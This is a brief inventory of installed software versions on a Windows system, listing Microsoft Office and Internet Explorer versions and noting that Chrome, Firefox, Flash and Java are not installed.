Microsoft Office Version 16.0.4266.1003

Internet Explorer Version 11.0.10586.0

Chrome Version Not installed

Firefox Version Not installed

Flash Version Not installed

Java Version Not installed
